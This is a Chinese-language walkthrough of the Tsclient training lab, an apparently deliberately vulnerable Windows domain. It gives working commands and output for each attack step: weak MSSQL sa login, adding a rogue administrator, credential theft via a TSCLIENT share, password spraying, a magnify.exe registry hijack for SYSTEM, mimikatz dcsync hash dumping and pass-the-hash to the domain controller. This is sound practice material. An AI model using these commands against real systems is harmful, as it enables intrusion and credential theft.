春秋云境 Tsclient

flag01

1
2
3
4
5
6
39.101.143.29:80 open
39.101.143.29:1433 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.101.143.29      code:200 len:703    title:IIS Windows Server
[+] mssql 39.101.143.29:1433:sa 1qaz!QAZ

mssql弱口令漏洞,MDUT直接打,激活组件后土豆提权

image-20240820163558842

可以加个用户

1
2
net user Chu0 whoami@666 /add
net localgroup administrators Chu0 /add
1
type c:\users\administrator\flag\flag01.txt

flag02

搭建代理扫内网

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
fscan322.exe -h 172.22.8.1/24 -o result.txt

172.22.8.15:88 open
172.22.8.46:135 open
172.22.8.18:135 open
172.22.8.46:80 open
172.22.8.18:80 open
172.22.8.31:445 open
172.22.8.18:1433 open
172.22.8.15:445 open
172.22.8.46:445 open
172.22.8.18:445 open
172.22.8.31:139 open
172.22.8.15:139 open
172.22.8.46:139 open
172.22.8.18:139 open
172.22.8.31:135 open
172.22.8.15:135 open
[*] NetInfo 
[*]172.22.8.31
   [->]WIN19-CLIENT
   [->]172.22.8.31
[*] NetInfo 
[*]172.22.8.46
   [->]WIN2016
   [->]172.22.8.46
[*] WebTitle http://172.22.8.18        code:200 len:703    title:IIS Windows Server
[*] NetBios 172.22.8.15     [+] DC:XIAORANG\DC01           
[*] NetInfo 
[*]172.22.8.15
   [->]DC01
   [->]172.22.8.15
[*] NetInfo 
[*]172.22.8.18
   [->]WIN-WEB
   [->]172.22.8.18
   [->]2001:0:348b:fb58:2076:31a7:d89a:70e2
[*] NetBios 172.22.8.31     XIAORANG\WIN19-CLIENT         
[*] NetBios 172.22.8.46     WIN2016.xiaorang.lab                Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.8.46        code:200 len:703    title:IIS Windows Server
[+] mssql 172.22.8.18:1433:sa 1qaz!QAZ

发现似乎没有什么能直接打的服务,回到入口机

1
2
net user  		   #查看当前机器用户
quser || qwinst    #查看在线用户
1
2
3
用户名                会话名             ID  状态    空闲时间   登录时间
john                  rdp-tcp#0           2  运行中         17  2024/8/20 16:32
chu0                  rdp-tcp#2           3  运行中          3  2024/8/20 16:40

发现存在john用户,用system权限上线CS,进程注入john用户上线,查看正在运行的服务

image-20240820165500146

直接通讯一下看看

image-20240820165533174

1
shell type \\TSCLIENT\C\credential.txt

得到一套账号密码,不过好像没有flag

1
xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

拿着账号密码去爆一下吧

1
proxychains4 crackmapexec smb 172.22.8.1/24 -u Aldrich -p 'Ald@rLMWuy7Z!#' -d xiaorang.lab 2>/dev/null

image-20240820170747006

尝试登录31,提示密码过期,所以换个方式登录,或者直接修改密码再登录

1
proxychains4  rdesktop 172.22.8.31

密码修改成功,但是没有权限登录,接着登46

1
proxychains4  rdesktop 172.22.8.46

可以登录,后面还是用win的rdp方便,bloodhound收集一下信息

image-20240820172331721

发现WIN2016为域管用户,后面就要用WIN2016去dump域管哈希了,所以现在就需要提权了,后面

image-20240820172526252

这里我们发现所有正常登录的用户都可以修改注册表,利用这个性质,修改注册表映像劫持,使用放大镜进行提权,其实也就是把本来用户主页点放大镜启动的magnify.exe替换成C:\windows\system32\cmd.exe,这样就直接提权成system了,先把shell和mimikatz传上去

1
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

将屏幕锁定,然后打开放大镜就是system权限终端了,可以利用cs做转发上线,也可以直接在终端抓取哈希,先拿个flag然后拿哈希

1
type c:\Users\Administrator\flag\flag02.txt

flag03

1
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

结果如下

1
2
3
4
5
6
7
8
9
10
11
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502     krbtgt  3ffd5b58b4a6328659a606c3ea6f9b63        514
1000    DC01$   d61a2af9b1ab466717017651fd1c781b        532480
500     Administrator   2c9d81bdcf3ec8b1def10328a7cc2f08        512
1103    WIN2016$        3505cfb2a6769aff4c8cd85687257d29        16781312
1104    WIN19-CLIENT$   17258d4f49268599b4ff63c40d5b95a2        16781312
1105    Aldrich baef402f3580fe1c75dfceaef4ae419f        512

后面就是经典的横向了

1
proxychains4 impacket-smbexec -hashes :2c9d81bdcf3ec8b1def10328a7cc2f08 xiaorang.lab/administrator@172.22.8.15 -codec gbk
1
type c:\users\administrator\flag\flag03.txt